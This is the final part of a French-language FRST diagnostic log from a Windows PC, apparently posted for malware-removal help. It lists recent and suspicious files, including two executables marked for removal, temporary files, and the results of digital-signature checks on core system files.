2018-07-02 18:11 - 2017-05-03 22:36 - 000000000 ____D C:\Users\pc1\AppData\Roaming\WhatsApp
2018-07-01 12:25 - 2017-04-20 18:09 - 000000000 ____D C:\Users\pc1\Downloads\son
2018-06-28 23:07 - 2018-03-21 09:45 - 000835064 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-06-28 23:07 - 2018-03-21 09:45 - 000179704 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
==================== Fichiers à la racine de certains dossiers =======
2017-02-20 21:10 - 2017-05-02 09:35 - 000057444 _____ () C:\Program Files (x86)\metadata
2017-02-20 21:10 - 2017-05-02 09:06 - 000000040 _____ () C:\Program Files (x86)\settings.dat
2017-02-26 11:15 - 2017-02-26 11:15 - 000000000 _____ () C:\Users\pc1\AppData\Roaming\agent.dat
2017-02-26 11:15 - 2017-02-26 11:15 - 001132960 _____ () C:\Users\pc1\AppData\Roaming\Damsantex.tst
2017-05-31 13:46 - 2017-05-31 13:46 - 000000049 ____H () C:\Users\pc1\AppData\Roaming\eMail Verifier.ini
2017-05-19 11:32 - 2017-06-02 13:36 - 000003475 _____ () C:\Users\pc1\AppData\Roaming\go00001.bak
2017-02-26 11:12 - 2017-02-26 11:13 - 000015696 _____ () C:\Users\pc1\AppData\Roaming\InstallationConfiguration.xml
2017-02-26 11:12 - 2017-02-26 11:12 - 000140288 _____ () C:\Users\pc1\AppData\Roaming\Installer.dat
2017-06-02 15:43 - 2017-06-02 15:43 - 000000049 ____H () C:\Users\pc1\AppData\Roaming\MaxBulk registration.ini
2016-04-03 17:57 - 2017-05-08 15:21 - 000000132 _____ () C:\Users\pc1\AppData\Roaming\Préfs Filtre IllExportation Adobe CS6
2018-07-20 00:27 - 2018-07-20 00:27 - 000000132 _____ () C:\Users\pc1\AppData\Roaming\Préfs Format PNG Adobe CS6
2016-06-29 08:33 - 2018-01-25 15:08 - 000005632 _____ () C:\Users\pc1\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-10-12 11:36 - 2015-10-12 11:36 - 000000000 _____ () C:\Users\pc1\AppData\Local\{B1C33B2F-8FDC-408C-8438-0EEEDBBF18F3}
Fichiers à déplacer ou supprimer:
====================
C:\Users\pc1\AppData\Roaming\gplyra\gplyra.exe
C:\Users\pc1\AppData\Local\background_fault\aswRD.exe
Certains fichiers dans TEMP:
====================
2017-11-28 18:37 - 2017-11-28 18:37 - 000009728 _____ () C:\Users\pc1\AppData\Local\Temp\bassmod.dll
2017-07-13 20:50 - 2017-07-13 21:01 - 058740704 _____ (Skype Technologies S.A.) C:\Users\pc1\AppData\Local\Temp\SkypeSetup.exe
2017-09-15 17:21 - 2017-09-15 17:30 - 030950664 _____ () C:\Users\pc1\AppData\Local\Temp\vlc-2.2.6-win32.exe
==================== Bamital & volsnap ======================
(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)
C:\Windows\system32\winlogon.exe => Le fichier est signé numériquement
C:\Windows\system32\wininit.exe => Le fichier est signé numériquement
C:\Windows\explorer.exe => Le fichier est signé numériquement
C:\Windows\SysWOW64\explorer.exe => Le fichier est signé numériquement
C:\Windows\system32\svchost.exe => Le fichier est signé numériquement
C:\Windows\SysWOW64\svchost.exe => Le fichier est signé numériquement
C:\Windows\system32\services.exe => Le fichier est signé numériquement
C:\Windows\system32\User32.dll => Le fichier est signé numériquement
C:\Windows\SysWOW64\User32.dll => Le fichier est signé numériquement
C:\Windows\system32\userinit.exe => Le fichier est signé numériquement
C:\Windows\SysWOW64\userinit.exe => Le fichier est signé numériquement
C:\Windows\system32\rpcss.dll => Le fichier est signé numériquement
C:\Windows\system32\dnsapi.dll => Le fichier est signé numériquement
C:\Windows\SysWOW64\dnsapi.dll => Le fichier est signé numériquement
C:\Windows\system32\Drivers\volsnap.sys => Le fichier est signé numériquement
LastRegBack: 2018-07-26 15:55
==================== Fin de FRST.txt ============================